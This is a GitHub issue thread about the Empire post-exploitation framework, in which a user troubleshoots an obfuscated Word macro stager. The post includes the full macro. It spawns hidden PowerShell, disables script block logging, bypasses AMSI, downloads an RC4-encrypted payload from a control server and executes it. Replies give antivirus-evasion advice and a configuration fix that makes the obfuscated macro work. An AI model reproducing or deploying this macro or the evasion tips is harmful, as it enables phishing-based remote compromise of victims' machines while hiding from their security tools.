EmpireProject / Empire

Empire is a PowerShell and Python post-exploitation agent.
http://www.powershellempire.com/
BSD 3-Clause "New" or "Revised" License

obfuscated not work in macro #1281

Open Masoud180 opened 5 years ago

Masoud180 commented 5 years ago

Empire Version

2.5-dev

OS Information (Linux flavor, Python version)

kali 2018

Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.

When I use usestager windows/macro and enable Obfuscated, and I also set ObfuscatedCommand to "Token\All\1,Launcher\STDIN++\12467", the macro I create in Word gives an error. But when I don't use Obfuscated, a shell returns. What should I do?

Screenshot of error, embedded text output, or Pastebin link to the error

Any additional information

I use Word 2010.

Macro Obfuscated Payload

Sub Auto_Open() tj End Sub

Sub AutoOpen() tj End Sub

Sub Document_Open() tj End Sub

Public Function tj() As Variant Dim YIz As String YIz = "CMD.EXE /C "sEt txuM= ^&("{1}{0}" -f 'ET','S" YIz = YIz + "') oY2 ([TYPE]("{8}{9}{3}{7}{2}{0}{6}{4}{1}{5}" -" YIz = YIz + "F 'Ry[S','SYsT','ionA','TIoNs.GENer',',','Em.ObJeC" YIz = YIz + "T','TRinG','ic.Dict','Co','lLEc') ); .("{1}{0}"-f" YIz = YIz + "'et-Item','S') ('v'+'arIA'+'BlE:R9TJ3'+'u') ( [Ty" YIz = YIz + "pE]("{2}{0}{3}{1}"-F 'i','BLoCk','sCR','pt') ) ;$" YIz = YIz + "EUh3 =TypE ; .("{1}{0}"-f '" YIz = YIz + "et','S') ("687"+"2") ( [tYPE]("{6}{7}{1}{4}{2}{" YIz = YIz + "9}{8}{3}{5}{0}" - f 'R','T','m.','ErvI','e','cepOiNtM" YIz = YIz + "anAgE','S','yS','.s','neT') ); ^&("{0}{2}{1}" -f" YIz = YIz + "'se','IAblE','t-vAR') ('OU4'+'7') ( [Type]("{4}{1" YIz = YIz + "}{0}{2}{3}" - f 'T.WebrEq','E','uE','sT','sYstem.n')" YIz = YIz + " ); .("{0}{2}{1}"-f'Se','-ITEm','t') vArIablE:h" YIz = YIz + "47O ([tyPE]("{0}{3}{2}{1}{4}" -F 'syStEm','EDEnTiA" YIz = YIz + "','Cr','.nET.','LCache') ) ; $7P2o = [TYPe](""" YIz = YIz + "{0}{2}{4}{1}{3}" - f 'SY','eM','s','.TeXT.eNCODiNG','" YIz = YIz + "t') ; .('sV') 8ift ([type]("{3}{1}{2}{0}" -f '" YIz = YIz + "Oding','t','.eNc','teX') ) ; ^&("{0}{1}"-f'SE','" YIz = YIz + "T-item') ("Va"+"ria"+"BLe:tLX"+"9C") ( [tyPe]("{1}" YIz = YIz + "{0}{2}" - f 'ONvE','C','rt')) ; IF(${PSVersiONTa" YIz = YIz + "BLe}."psvERSiOn"."mAJOr" -Ge 3){${E809}= ( ." 
YIz = YIz + "("{0}{1}"-f'vA','RIABlE') ('e'+'uH3') ).VAlUe."A" YIz = YIz + "SSEmBly".("{0}{1}{2}"-f'Ge','TT','yPe').Invoke(("" YIz = YIz + "{1}{4}{5}{0}{3}{2}" - f 'men','S','tomation.Utils','" YIz = YIz + "t.Au','ystem.M','anage'))."GeTFIeLD"(("{3}{0}{5}{" YIz = YIz + "6}{1}{2}{4}" - f 'GroupP','y','Se','cached','ttings'" YIz = YIz + ",'ol','ic'),'N'+("{2}{1}{0}{3}"-f 'c,S','li','onPu" YIz = YIz + "b','tatic'));If(${e809}){${6B66}=${E809}.("{2}{" YIz = YIz + "0}{1}" - f 'VaLU','E','GeT').Invoke(${nULl});IF(${6" YIz = YIz + "b66}[("{0}{1}" -f 'Sc','riptB')+("{2}{0}{1}" -f'i" YIz = YIz + "','ng','lockLogg')]){${6b66}[("{2}{0}{1}"-f'rip'," YIz = YIz + "'tB','Sc')+("{2}{0}{1}"-f 'Lo','gging','lock')][("" YIz = YIz + "{2}{1}{3}{0}" - f 'ptB','bleSc','Ena','ri')+("{0}{1" YIz = YIz + "}{3}{2}" - f 'lo','c','Logging','k')]=0;${6B66}[("{" YIz = YIz + "0}{1}" - f 'Scri','ptB')+("{0}{2}{1}"-f 'lockLogg','" YIz = YIz + "ng','i')][("{9}{8}{6}{3}{4}{7}{5}{2}{1}{0}"-f'ing'" YIz = YIz + ",'g','og','B','lo','cationL','cript','ckInvo','abl" YIz = YIz + "eS','En')]=0}${VAL}= $oy2::("{1}{0}" -f 'w','NE')" YIz = YIz + ".Invoke();${vAl}.("{0}{1}"-f'A','Dd').Invoke(("{3" YIz = YIz + "}{0}{2}{1}" - f 'c','B','ript','EnableS')+("{0}{1}{" YIz = YIz + "2}" - f 'lockL','ogg','ing'),0);${vAl}.("{0}{1}" -f" YIz = YIz + "'A','Dd').Invoke(("{4}{3}{1}{0}{2}{5}{6}" -f 'lock" YIz = YIz + "','tB','I','rip','EnableSc','nvoca','tionLogging')" YIz = YIz + ",0);${6b66}[((("{18}{7}{16}{13}{3}{0}{14}{15}{17}" YIz = YIz + "{11}{5}{1}{9}{8}{12}{4}{6}{10}{2}" - f 'e{0}Pol','0" YIz = YIz + "}W','riptB','0}Softwar','Shel','t{','l','_LOC','nd" YIz = YIz + "ows','i','{0}Sc','crosof','{0}Power','NE{','icie'," YIz = YIz + "'s{0}','AL_MACHI','Mi','HKEY')) -F[ChaR]92)+("{3}{" YIz = YIz + "0}{1}{2}" - f 'ock','Log','ging','l')]=${VAL}}ElSE{" YIz = YIz + " (^&('lS') ('V'+'aria'+'BLE:r9TJ3'+'U') ).VALUe" YIz = YIz + "."GetFIeLd"(("{0}{2}{1}"-f 'signa','es','tur'),'N" YIz = YIz + "'+("{2}{4}{1}{3}{0}" -f 
'atic',',S','onPubli','t'," YIz = YIz + "'c'))."SetVALUE"(${Null},(.("{1}{0}{2}"-f'eW-'," YIz = YIz + "'N','ObJeCT') ("{4}{6}{0}{5}{2}{1}{7}{3}" -f 'LeC'" YIz = YIz + ",'enERIC.H','oNS.G','hSEt[STRInG]','CO','TI','L','" YIz = YIz + "AS')))}${ReF}= $euh3."ASseMbLy".("{1}{0}" -f 'Pe" YIz = YIz + "','GeTTy').Invoke(("{4}{0}{5}{6}{7}{1}{3}{2}" -f '" YIz = YIz + "Ma','ion.AmsiU','ls','ti','System.','nageme','nt.A" YIz = YIz + "ut','omat'));${ReF}.("{1}{2}{0}"-f 'LD','G','eTFI" YIz = YIz + "e').Invoke(("{4}{0}{2}{3}{1}" -f'si','ailed','Init" YIz = YIz + "','F','am'),("{0}{1}{2}{3}" -f'Non','Public',',S'," YIz = YIz + "'tatic')).("{0}{1}{2}" -f 'SE','t','ValuE').Invoke" YIz = YIz + "(${NulL},${TrUE});}; (.("{2}{0}{3}{1}"-f 'T-Chil" YIz = YIz + "','eM','GE','DiT') ("vAriABLE:"+"68"+"7"+"2") )." YIz = YIz + "vAlUe::"exPeCt100conTiNUE"=0;${8d13}=^&("{2}{" YIz = YIz + "0}{1}" - f 'EW-','ObJEct','N') ("{3}{0}{4}{2}{1}" -f" YIz = YIz + " 'E','WeBCliENT','t.','SYst','m.NE');${U}=(("{11}{" YIz = YIz + "8}{2}{9}{1}{12}{7}{0}{5}{4}{3}{10}{6}" - f '; ','; WO" YIz = YIz + "W64','la/5.0 ','e','.0) like G','rv:11','o','ident" YIz = YIz + "/7.0','l','(Windows NT 6.1','ck','Mozi','; Tr'));$" YIz = YIz + "{Wc}."heAderS".("{0}{1}" -f'AD','D').Invoke(("{0}" YIz = YIz + "{2}{1}" - f 'User-Ag','nt','e'),${U});${8d13}."HeA" YIz = YIz + "dErS".("{0}{1}"-f'AD','d').Invoke(("{3}{0}{2}{1}"" YIz = YIz + "-f 'r','gent','-A','Use'),${u});${8D13}."PRoXy"=" YIz = YIz + " ( ^&('lS') ("VARIab"+"L"+"E:"+"ou47") ).value::"" YIz = YIz + "dEFaulTweBProXY";${8d13}."PROXy"."cREDeNTi" YIz = YIz + "ALS" = $h47O::"dEFAUlTnETWorkcRedENtIALs";" YIz = YIz + "${SCriPt:PrOXy} = ${8D13}."pRoXy";${K}= $7P2O:" YIz = YIz + ":"ASCII".("{0}{2}{1}" -f'G','es','EtByT').Invoke(" YIz = YIz + "'z@,I2lAH^|8d:5ve^&murP=6U;M*soi+b{');${R}={${d},$" YIz = YIz + "{K}=${argS};${s}=0..255;0..255^|.('%'){${j}=(${j}" YIz = YIz + "+${s}[${_}]+${K}[${_}%${K}."cOUNT"])%256;${S}[${" YIz = YIz + 
"}],${S}[${j}]=${S}[${J}],${S}[${}]};${d}^|.('%'){" YIz = YIz + "${I}=(${i}+1)%256;${h}=(${h}+${S}[${i}])%256;${s}[" YIz = YIz + "${i}],${S}[${H}]=${s}[${H}],${s}[${I}];${_}-bXOr${" YIz = YIz + "s}[(${s}[${I}]+${S}[${H}])%256]}};${seR}=$( (^&(" YIz = YIz + ""{1}{3}{0}{2}"-f'Dit','cH','em','il') vAriABLe:8if" YIz = YIz + "t ).vALUE::"uNIcodE"."GETSTrINg"( ( .("{1}{2}" YIz = YIz + "{0}" - f 'able','geT-vA','Ri') ('Tl'+'X9C') -vaLue" YIz = YIz + "on)::("{3}{4}{0}{1}{2}"-f'6','4STriN','g','F','rom" YIz = YIz + "BASE').Invoke(("{13}{2}{10}{6}{3}{1}{4}{8}{7}{12}{" YIz = YIz + "9}{11}{5}{0}" - f 'AA==','LwAxADkAMg','QA','AC8A','A" YIz = YIz + "uA','Ax','A6','gA4AC4A','DEAN','ADEA','cA','MQ','M" YIz = YIz + "QAu','aAB0AH'))));${t}=("{2}{3}{4}{0}{1}"-f 'p','h" YIz = YIz + "p','/admin','/g','et.');${8D13}."headERs".("{0}" YIz = YIz + "{1}" - f 'A','dD').Invoke(("{1}{2}{0}" -f 'ie','Co','" YIz = YIz + "ok'),("{5}{12}{6}{8}{4}{10}{1}{9}{3}{2}{7}{0}{11}"" YIz = YIz + " -f'mhau','V','XNB','u1','k1N','BRjgUQqXx','ox','N" YIz = YIz + "u6','iy=G3w','Y','mB6','vMG8=','m'));${DATa}=${8" YIz = YIz + "D13}.("{0}{2}{1}" -f 'DO','oADDATA','wnl').Invoke(" YIz = YIz + "${sER}+${t});${IV}=${DaTa}[0..3];${dATA}=${DA" YIz = YIz + "tA}[4..${DaTA}."LENgtH"];-JOIn[CHar[]](^& ${R} $" YIz = YIz + "{DA`TA} (${iV}+${k}))^|.("{1}{0}"-f'EX','I')&& sE" YIz = YIz + "t zAMX=EchO ${ExeCUTioncONtExt}.INVoKEcoMMAND.IN" YIz = YIz + "VOKesCRiPt(([EnViroNment]::GEtEnViRonmEntVARiaBle(" YIz = YIz + "'txUm','PrOceSs')) ) ^| PowERSHeLL -exECuTIONP" YIz = YIz + "ol BYPass -NOP -NOniNT -WiNdowSTYl HIdd -Noex" YIz = YIz + "I - &&CMD.EXE /C%zaMx%""" Const HIDDEN_WINDOW = 0 strComputer = "." 
Set objWMIService = GetObject("winmgmts:\" & strComputer & "\root\cimv2") Set objStartup = objWMIService.Get("Win32ProcessStartup") Set objConfig = objStartup.SpawnInstance objConfig.ShowWindow = HIDDEN_WINDOW Set objProcess = GetObject("winmgmts:\" & strComputer & "\root\cimv2:Win32_Process") objProcess.Create YIz, Null, objConfig, intProcessID End Function

ThePirateWhoSmellsOfSunflowers commented 5 years ago

Hi,

I think it's because the macro needs to be Base64 encoded. As you can see in your screenshot, the red lines are not valid VBA code.

:sunflower:

Masoud180 commented 5 years ago

Yes, that's right. When I obfuscated it, the payload had a problem. I want to use it to bypass antivirus. What should I do to avoid syntax problems when I obfuscate the payload?

ThePirateWhoSmellsOfSunflowers commented 5 years ago

Rewrite the macro to be valid VBA code ;) In my opinion, if you want to bypass antivirus you need to write your own obfuscation method. For example start to determine what is caught by the antivirus and then try to obfuscate it (e.g powershell string is suspect in YIz = YIz + "'txUm','PrOceSs')) ) ^| PowERSHeLL -exECuTIONP").

I manage to bypass some antivirus with a (private) script that take an Empire macro in input and apply a second layer of obfuscation (with basics techniques such as Base64, strings splitting, random variable name...), nothing l33t, just 50 lines of python.

:sunflower:

Hubbl3 commented 5 years ago

It's not broken. The default profile has ObfuscateCommand set to Token\All\1, Launcher\STDIN++\12467; the second part, Launcher\STDIN++\12467, tacks on a launcher to be used on the command line, which is not VBA-compatible. If you run: set ObfuscateCommand Token\All\1

it will work fine. No need to write a separate python script for it.